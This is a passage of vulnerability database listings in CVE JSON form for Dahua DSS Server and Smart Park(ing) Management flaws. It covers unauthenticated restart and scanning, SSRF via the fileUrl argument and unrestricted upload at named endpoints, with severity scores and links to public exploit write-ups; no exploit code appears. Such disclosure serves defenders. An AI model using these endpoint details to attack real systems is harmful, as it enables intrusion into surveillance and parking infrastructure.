                "technical-description"
              ],
              "url": "https://vuldb.com/?id.230800"
            },
            {
              "tags": [
                "signature",
                "permissions-required"
              ],
              "url": "https://vuldb.com/?ctiid.230800"
            },
            {
              "tags": [
                "exploit"
              ],
              "url": "https://github.com/RCEraser/cve/blob/main/DaHua..md"
            }
          ],
          "timeline": [
            {
              "lang": "en",
              "time": "2023-06-06T00:00:00.000Z",
              "value": "Advisory disclosed"
            },
            {
              "lang": "en",
              "time": "2023-06-06T00:00:00.000Z",
              "value": "CVE reserved"
            },
            {
              "lang": "en",
              "time": "2023-06-06T02:00:00.000Z",
              "value": "VulDB entry created"
            },
            {
              "lang": "en",
              "time": "2023-06-30T14:48:14.000Z",
              "value": "VulDB entry last update"
            }
          ],
          "title": "Dahua Smart Parking Management image server-side request forgery"
        }
      },
      "cveMetadata": {
        "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "assignerShortName": "VulDB",
        "cveId": "CVE-2023-3121",
        "datePublished": "2023-06-06T11:00:05.120Z",
        "dateReserved": "2023-06-06T10:09:00.185Z",
        "dateUpdated": "2024-08-02T06:48:07.341Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-45434 (GCVE-0-2022-45434)

    Vulnerability from nvd – Published: 2022-12-27 00:00 – Updated: 2025-04-14 12:59
    VLAI
    Summary
    Some Dahua software products have a vulnerability of unauthenticated un-throttled ICMP requests on remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could exploit the victim server to launch ICMP request attack to the designated target host.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • Allocation of Resources Without Limits or Throttling
    • CWE-770 - Allocation of Resources Without Limits or Throttling
    Assigner
    Impacted products
    Vendor Product Version
    n/a DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2 Affected: V8.0.2, V8.0.4, V8.1
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T14:09:57.035Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "HIGH",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 5.9,
                  "baseSeverity": "MEDIUM",
                  "confidentialityImpact": "NONE",
                  "integrityImpact": "NONE",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2022-45434",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-04-14T12:59:05.995633Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "problemTypes": [
              {
                "descriptions": [
                  {
                    "cweId": "CWE-770",
                    "description": "CWE-770 Allocation of Resources Without Limits or Throttling",
                    "lang": "en",
                    "type": "CWE"
                  }
                ]
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-04-14T12:59:11.203Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "V8.0.2, V8.0.4, V8.1"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Some Dahua software products have a vulnerability of unauthenticated un-throttled ICMP requests on remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could exploit the victim server to launch ICMP request attack to the designated target host."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Allocation of Resources Without Limits or Throttling",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-12-27T00:00:00.000Z",
            "orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
            "shortName": "dahua"
          },
          "references": [
            {
              "url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
        "assignerShortName": "dahua",
        "cveId": "CVE-2022-45434",
        "datePublished": "2022-12-27T00:00:00.000Z",
        "dateReserved": "2022-11-14T00:00:00.000Z",
        "dateUpdated": "2025-04-14T12:59:11.203Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-45433 (GCVE-0-2022-45433)

    Vulnerability from nvd – Published: 2022-12-27 00:00 – Updated: 2025-04-14 13:05
    VLAI
    Summary
    Some Dahua software products have a vulnerability of unauthenticated traceroute host from remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could get the traceroute results.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • Improper Access Control
    • CWE-306 - Missing Authentication for Critical Function
    Assigner
    Impacted products
    Vendor Product Version
    n/a DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2 Affected: V8.0.2, V8.0.4, V8.1
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T14:09:57.038Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "HIGH",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "NONE",
                  "baseScore": 3.7,
                  "baseSeverity": "LOW",
                  "confidentialityImpact": "LOW",
                  "integrityImpact": "NONE",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2022-45433",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-04-14T13:05:16.598801Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "problemTypes": [
              {
                "descriptions": [
                  {
                    "cweId": "CWE-306",
                    "description": "CWE-306 Missing Authentication for Critical Function",
                    "lang": "en",
                    "type": "CWE"
                  }
                ]
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-04-14T13:05:43.020Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "V8.0.2, V8.0.4, V8.1"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Some Dahua software products have a vulnerability of unauthenticated traceroute host from remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could get the traceroute results."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Improper Access Control",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-12-27T00:00:00.000Z",
            "orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
            "shortName": "dahua"
          },
          "references": [
            {
              "url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
        "assignerShortName": "dahua",
        "cveId": "CVE-2022-45433",
        "datePublished": "2022-12-27T00:00:00.000Z",
        "dateReserved": "2022-11-14T00:00:00.000Z",
        "dateUpdated": "2025-04-14T13:05:43.020Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-45432 (GCVE-0-2022-45432)

    Vulnerability from nvd – Published: 2022-12-27 00:00 – Updated: 2025-04-14 13:08
    VLAI
    Summary
    Some Dahua software products have a vulnerability of unauthenticated search for devices. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could unauthenticated search for devices in range of IPs from remote DSS Server.
    SSVC
    Exploitation: none Automatable: yes Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • Improper Access Control
    • CWE-306 - Missing Authentication for Critical Function
    Assigner
    Impacted products
    Vendor Product Version
    n/a DSS Professional、DSS Express、DHI-DSS7016D-S2/DHI-DSS7016DR-S2、DHI-DSS4004-S2 Affected: V8.0.2, V8.0.4, V8.1
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T14:09:56.985Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "NONE",
                  "baseScore": 5.3,
                  "baseSeverity": "MEDIUM",
                  "confidentialityImpact": "LOW",
                  "integrityImpact": "NONE",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2022-45432",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-04-14T13:08:04.274952Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "problemTypes": [
              {
                "descriptions": [
                  {
                    "cweId": "CWE-306",
                    "description": "CWE-306 Missing Authentication for Critical Function",
                    "lang": "en",
                    "type": "CWE"
                  }
                ]
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-04-14T13:08:12.283Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "DSS Professional\u3001DSS Express\u3001DHI-DSS7016D-S2/DHI-DSS7016DR-S2\u3001DHI-DSS4004-S2",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "V8.0.2, V8.0.4, V8.1"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Some Dahua software products have a vulnerability of unauthenticated search for devices. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could unauthenticated search for devices in range of IPs from remote DSS Server."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Improper Access Control",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-12-27T00:00:00.000Z",
            "orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
            "shortName": "dahua"
          },
          "references": [
            {
              "url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
        "assignerShortName": "dahua",
        "cveId": "CVE-2022-45432",
        "datePublished": "2022-12-27T00:00:00.000Z",
        "dateReserved": "2022-11-14T00:00:00.000Z",
        "dateUpdated": "2025-04-14T13:08:12.283Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-45431 (GCVE-0-2022-45431)

    Vulnerability from nvd – Published: 2022-12-27 00:00 – Updated: 2025-04-11 23:07
    VLAI
    Summary
    Some Dahua software products have a vulnerability of unauthenticated restart of remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could unauthenticated restart of remote DSS Server.
    SSVC
    Exploitation: none Automatable: yes Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • Improper Access Control
    • CWE-284 - Improper Access Control
    Assigner
    Impacted products
    Vendor Product Version
    n/a DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2 Affected: V8.0.2, V8.0.4, V8.1
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T14:09:57.052Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 7.5,
                  "baseSeverity": "HIGH",
                  "confidentialityImpact": "NONE",
                  "integrityImpact": "NONE",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2022-45431",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-04-11T23:06:20.607432Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "problemTypes": [
              {
                "descriptions": [
                  {
                    "cweId": "CWE-284",
                    "description": "CWE-284 Improper Access Control",
                    "lang": "en",
                    "type": "CWE"
                  }
                ]
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-04-11T23:07:11.025Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "V8.0.2, V8.0.4, V8.1"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Some Dahua software products have a vulnerability of unauthenticated restart of remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could unauthenticated restart of remote DSS Server."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Improper Access Control",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-12-27T00:00:00.000Z",
            "orgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
            "shortName": "dahua"
          },
          "references": [
            {
              "url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "79ee569e-7d1e-4364-98f0-3a18e2a739ad",
        "assignerShortName": "dahua",
        "cveId": "CVE-2022-45431",
        "datePublished": "2022-12-27T00:00:00.000Z",
        "dateReserved": "2022-11-14T00:00:00.000Z",
        "dateUpdated": "2025-04-11T23:07:11.025Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2023-3836 (GCVE-0-2023-3836)

    Vulnerability from cvelistv5 – Published: 2023-07-22 18:00 – Updated: 2024-08-02 07:08
    VLAI Shadowserver KEVIntel
    Title
    Dahua Smart Park Management unrestricted upload
    Summary
    A vulnerability classified as critical was found in Dahua Smart Park Management up to 20230713. This vulnerability affects unknown code of the file /emap/devicePoint_addImgIco?hasSubsystem=true. The manipulation of the argument upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235162 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
    CWE
    Assigner
    References
    URL Tags
    https://vuldb.com/?id.235162 vdb-entrytechnical-description
    https://vuldb.com/?ctiid.235162 signaturepermissions-required
    https://github.com/qiuhuihk/cve/blob/main/upload.md exploit
    Impacted products
    Credits
    qiuhui (VulDB User)
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-02T07:08:50.600Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "vdb-entry",
                  "technical-description",
                  "x_transferred"
                ],
                "url": "https://vuldb.com/?id.235162"
              },
              {
                "tags": [
                  "signature",
                  "permissions-required",
                  "x_transferred"
                ],
                "url": "https://vuldb.com/?ctiid.235162"
              },
              {
                "tags": [
                  "exploit",
                  "x_transferred"
                ],
                "url": "https://github.com/qiuhuihk/cve/blob/main/upload.md"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Smart Park Management",
              "vendor": "Dahua",
              "versions": [
                {
                  "status": "affected",
                  "version": "20230713"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "analyst",
              "value": "qiuhui (VulDB User)"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "A vulnerability classified as critical was found in Dahua Smart Park Management up to 20230713. This vulnerability affects unknown code of the file /emap/devicePoint_addImgIco?hasSubsystem=true. The manipulation of the argument upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235162 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
            },
            {
              "lang": "de",
              "value": "In Dahua Smart Park Management bis 20230713 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Betroffen ist eine unbekannte Verarbeitung der Datei /emap/devicePoint_addImgIco?hasSubsystem=true. Durch Manipulation des Arguments upload mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk passieren. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "baseScore": 6.3,
                "baseSeverity": "MEDIUM",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
                "version": "3.1"
              }
            },
            {
              "cvssV3_0": {
                "baseScore": 6.3,
                "baseSeverity": "MEDIUM",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
                "version": "3.0"
              }
            },
            {
              "cvssV2_0": {
                "baseScore": 6.5,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-434",
                  "description": "CWE-434 Unrestricted Upload",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2023-10-24T06:25:47.211Z",
            "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
            "shortName": "VulDB"
          },
          "references": [
            {
              "tags": [
                "vdb-entry",
                "technical-description"
              ],
              "url": "https://vuldb.com/?id.235162"
            },
            {
              "tags": [
                "signature",
                "permissions-required"
              ],
              "url": "https://vuldb.com/?ctiid.235162"
            },
            {
              "tags": [
                "exploit"
              ],
              "url": "https://github.com/qiuhuihk/cve/blob/main/upload.md"
            }
          ],
          "timeline": [
            {
              "lang": "en",
              "time": "2023-07-21T00:00:00.000Z",
              "value": "Advisory disclosed"
            },
            {
              "lang": "en",
              "time": "2023-07-21T00:00:00.000Z",
              "value": "CVE reserved"
            },
            {
              "lang": "en",
              "time": "2023-07-21T02:00:00.000Z",
              "value": "VulDB entry created"
            },
            {
              "lang": "en",
              "time": "2023-08-15T21:58:00.000Z",
              "value": "VulDB entry last update"
            }
          ],
          "title": "Dahua Smart Park Management unrestricted upload"
        }
      },
      "cveMetadata": {
        "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "assignerShortName": "VulDB",
        "cveId": "CVE-2023-3836",
        "datePublished": "2023-07-22T18:00:05.786Z",
        "dateReserved": "2023-07-21T20:50:50.266Z",
        "dateUpdated": "2024-08-02T07:08:50.600Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2023-3121 (GCVE-0-2023-3121)

    Vulnerability from cvelistv5 – Published: 2023-06-06 11:00 – Updated: 2024-08-02 06:48
    VLAI
    Title
    Dahua Smart Parking Management image server-side request forgery
    Summary
    A vulnerability has been found in Dahua Smart Parking Management up to 20230528 and classified as problematic. This vulnerability affects unknown code of the file /ipms/imageConvert/image. The manipulation of the argument fileUrl leads to server-side request forgery. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230800. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
    CWE
    • CWE-918 - Server-Side Request Forgery
    Assigner
    References
    URL Tags
    https://vuldb.com/?id.230800 vdb-entrytechnical-description
    https://vuldb.com/?ctiid.230800 signaturepermissions-required
    https://github.com/RCEraser/cve/blob/main/DaHua..md exploit
    Impacted products
    Credits
    RCEraser (VulDB User)
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-02T06:48:07.341Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "vdb-entry",
                  "technical-description",
                  "x_transferred"
                ],
                "url": "https://vuldb.com/?id.230800"
              },
              {
                "tags": [
                  "signature",
                  "permissions-required",
                  "x_transferred"
                ],
                "url": "https://vuldb.com/?ctiid.230800"
              },
              {
                "tags": [
                  "exploit",
                  "x_transferred"
                ],
                "url": "https://github.com/RCEraser/cve/blob/main/DaHua..md"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Smart Parking Management",
              "vendor": "Dahua",
              "versions": [
                {
                  "status": "affected",
                  "version": "20230528"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "analyst",
              "value": "RCEraser (VulDB User)"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "A vulnerability has been found in Dahua Smart Parking Management up to 20230528 and classified as problematic. This vulnerability affects unknown code of the file /ipms/imageConvert/image. The manipulation of the argument fileUrl leads to server-side request forgery. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230800. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
            },
            {
              "lang": "de",
              "value": "In Dahua Smart Parking Management bis 20230528 wurde eine problematische Schwachstelle gefunden. Es geht um eine nicht n\u00e4her bekannte Funktion der Datei /ipms/imageConvert/image. Durch das Beeinflussen des Arguments fileUrl mit unbekannten Daten kann eine server-side request forgery-Schwachstelle ausgenutzt werden. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "baseScore": 3.5,
                "baseSeverity": "LOW",
                "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
                "version": "3.1"
              }
            },
            {
              "cvssV3_0": {
                "baseScore": 3.5,
                "baseSeverity": "LOW",
                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
                "version": "3.0"
              }
            },
            {
              "cvssV2_0": {
                "baseScore": 2.7,
                "vectorString": "AV:A/AC:L/Au:S/C:P/I:N/A:N",
                "version": "2.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-918",
                  "description": "CWE-918 Server-Side Request Forgery",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2023-10-23T12:43:09.475Z",
            "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
            "shortName": "VulDB"
          },
          "references": [
            {
              "tags": [
                "vdb-entry",
                "technical-description"
              ],
              "url": "https://vuldb.com/?id.230800"
            },
            {
              "tags": [
                "signature",
                "permissions-required"
              ],
              "url": "https://vuldb.com/?ctiid.230800"
            },
            {
              "tags": [
                "exploit"
              ],
              "url": "https://github.com/RCEraser/cve/blob/main/DaHua..md"
            }
          ],
          "timeline": [
            {
              "lang": "en",
              "time": "2023-06-06T00:00:00.000Z",
              "value": "Advisory disclosed"
            },
            {
              "lang": "en",
              "time": "2023-06-06T00:00:00.000Z",
              "value": "CVE reserved"
            },
            {
              "lang": "en",
              "time": "2023-06-06T02:00:00.000Z",
              "value": "VulDB entry created"
            },
            {
              "lang": "en",
              "time": "2023-06-30T14:48:14.000Z",
              "value": "VulDB entry last update"
            }
          ],
          "title": "Dahua Smart Parking Management image server-side request forgery"
        }
      },
      "cveMetadata": {
        "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "assignerShortName": "VulDB",
        "cveId": "CVE-2023-3121",
        "datePublished": "2023-06-06T11:00:05.120Z",
        "dateReserved": "2023-06-06T10:09:00.185Z",
        "dateUpdated": "2024-08-02T06:48:07.341Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-45434 (GCVE-0-2022-45434)

    Vulnerability from cvelistv5 – Published: 2022-12-27 00:00 – Updated: 2025-04-14 12:59
    VLAI
    Summary
    Some Dahua software products have a vulnerability of unauthenticated un-throttled ICMP requests on remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could exploit the victim server to launch ICMP request attack to the designated target host.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • Allocation of Resources Without Limits or Throttling
    • CWE-770 - Allocation of Resources Without Limits or Throttling
    Assigner
    Impacted products
    Vendor Product Version
    n/a DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2 Affected: V8.0.2, V8.0.4, V8.1
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T14:09:57.035Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://www.dahuasecurity.com/support/cybersecurity/details/1137"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "HIGH",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 5.9,
                  "baseSeverity": "MEDIUM",
                  "confidentialityImpact": "NONE",
                  "integrityImpact": "NONE",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2022-45434",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-04-14T12:59:05.995633Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "problemTypes": [
              {
                "descriptions": [
                  {
                    "cweId": "CWE-770",
                    "description": "CWE-770 Allocation of Resources Without Limits or Throttling",
                    "lang": "en",
                    "type": "CWE"
                  }
                ]
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-04-14T12:59:11.203Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "DSS Professional, DSS Express, DHI-DSS7016D-S2/DHI-DSS7016DR-S2, DHI-DSS4004-S2",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "V8.0.2, V8.0.4, V8.1"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
